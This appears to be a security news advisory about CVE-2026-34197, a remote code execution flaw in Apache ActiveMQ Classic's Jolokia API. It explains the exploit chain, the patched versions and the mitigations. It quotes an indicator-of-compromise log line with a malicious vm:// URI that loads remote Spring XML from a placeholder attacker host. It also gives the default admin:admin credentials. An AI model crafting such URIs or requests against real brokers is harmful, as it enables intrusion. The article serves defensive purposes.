A critical remote code execution (RCE) vulnerability tracked as CVE-2026-34197 has been disclosed in Apache ActiveMQ Classic, exposing enterprise message brokers to arbitrary command execution through a design flaw that has lurked undetected in the codebase for over 13 years.
Added to the catalog on April 16, 2026, with a remediation deadline of April 30, 2026, this vulnerability demands immediate attention from security teams across all sectors that rely on ActiveMQ for distributed messaging infrastructure.
Apache ActiveMQ is one of the most widely deployed open-source Java message brokers worldwide, underpinning asynchronous communication across financial services, healthcare, e-commerce, and government environments.
Apache ActiveMQ Flaw
It acts as middleware that decouples services and manages message queues in distributed architectures, making it a critical infrastructure in thousands of enterprises globally.
The vulnerability affects only ActiveMQ Classic, the original broker implementation, and does not affect ActiveMQ Artemis. The broker ships by default with a web-based management console on port 8161, powered by the Jetty web server.
This console embeds Jolokia, an HTTP-to-JMX bridge that exposes broker management operations as a REST API at /api/jolokia/. That Jolokia endpoint sits at the heart of this newly disclosed vulnerability.
Assigned a CVSS v3.1 base score of 8.8 (High), CVE-2026-34197 is rooted in two interacting CWEs: CWE-20 (Improper Input Validation) and CWE-94 (Improper Control of Generation of Code / Code Injection).
The vulnerability chain works as follows: ActiveMQ’s default Jolokia access policy permits exec operations on all ActiveMQ MBeans, including BrokerService.addNetworkConnector(String).
An authenticated attacker can send a crafted POST request to the Jolokia endpoint, invoking this operation with a malicious discovery URI.
The URI manipulates the VM transport’s brokerConfig parameter to point at a remote, attacker-controlled Spring XML application context hosted over HTTP.
When ActiveMQ’s VM transport encounters a broker name that doesn’t exist, it automatically calls BrokerFactory.createBroker() using the attacker-supplied URL.
Spring ResourceXmlApplicationContext instantiates all singleton bean definitions before the BrokerService validates the configuration, meaning arbitrary code runs on the broker’s JVM via bean factory methods, such as Runtime.exec(), enabling full OS-level command execution.
This exploit path has existed since a prior Jolokia fix for CVE-2022-41678 inadvertently introduced a blanket <operation>*</operation> allow all ActiveMQ MBeans to follow a rule meant to preserve web console functionality, but one that opened an entirely new exploitation surface.
Unauthenticated RCE on Certain Versions
While CVE-2026-34197 nominally requires low-privilege credentials, the exploitation barrier drops to zero on ActiveMQ versions 6.0.0 through 6.1.1.
A separate flaw, CVE-2024-32114, inadvertently removed the /api/* path (which includes Jolokia) from the web console’s security constraints on those versions, making the entire Jolokia API unauthenticated.
The combination of these two CVEs results in a fully unauthenticated RCE chain, no credentials needed. Even on protected versions, the default credential pair admin:admin remains common across many ActiveMQ deployments, drastically reducing the practical exploitation barrier in real-world environments.
Affected Versions and Patch
Apache has confirmed patches are available in the following versions:
- Apache ActiveMQ Classic 5.19.4 (fixes the issue in the 5.x branch)
- Apache ActiveMQ Classic 6.2.3 (fixes the issue in the 6.x branch, and also resolves CVE-2024-32114)
Organizations running 6.0.0 through 6.1.1 must treat this as an emergency-priority upgrade, as they are vulnerable to unauthenticated RCE without any user interaction beyond network access to port 8161.
The patch removes the ability for the addNetworkConnector operation to register vm:// transports, a code path that was never intended to be exposed as a remote operation.
Mitigation Actions
CISA added CVE-2026-34197 to its KEV catalog on April 16, 2026, with a mandatory remediation due date of April 30, 2026, for federal agencies under BOD 22-01.
Apache ActiveMQ has appeared in the KEV catalog before, with CVE-2016-3088 and CVE-2023-46604 also listed, confirming that threat actors and ransomware operators consistently target it as a high-value system.
Organizations that cannot immediately patch should implement the following interim mitigations:
- Restrict access to port 8161 to trusted management networks only and block public internet exposure
- Disable or tightly lock down Jolokia exec operations at
/api/jolokia/ - Immediately rotate default credentials (
admin:admin) and enforce strong, unique authentication - Monitor broker logs for
vm://URIs containingbrokerConfig=xbean:httpan unambiguous indicator of active exploitation - Detect POST requests to
/api/jolokia/withaddNetworkConnectorin the request body, and watch for unexpected child processes spawned by the ActiveMQ Java process
Indicators of Compromise (IoCs)
Security teams should specifically search broker logs for entries such as:
INFO | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://[ATTACKER-IP]/payload.xmlThis log pattern definitely confirms an exploitation attempt. Critically, command execution occurs during the connection attempt, meaning the payload runs even if the log subsequently shows a configuration failure warning.
Frequently Asked Questions (FAQs)
Q1: Does CVE-2026-34197 affect Apache ActiveMQ Artemis?
No, CVE-2026-34197 exclusively affects Apache ActiveMQ Classic and does not impact the ActiveMQ Artemis implementation.
Q2: What CVSS score is assigned to CVE-2026-34197, and does it require authentication?
CVE-2026-34197 has a CVSS v3.1 score of 8.8 (High). It requires low-privilege credentials in most versions, but is fully unauthenticated on ActiveMQ 6.0.0–6.1.1 when chained with CVE-2024-32114.
Q3: How quickly should organizations patch CVE-2026-34197?
CISA mandates remediation by April 30, 2026, for federal agencies under BOD 22-01, and all organizations should treat this as critical, given the public PoC availability and ActiveMQ’s history of ransomware targeting.
Q4: What is the simplest interim mitigation if immediate patching is not possible?
Block external access to ActiveMQ’s web console port 8161, turn off Jolokia exec operations, and replace all default admin:admin credentials with strong authentication immediately.
Site: http://thecybrdef.com
About the Author
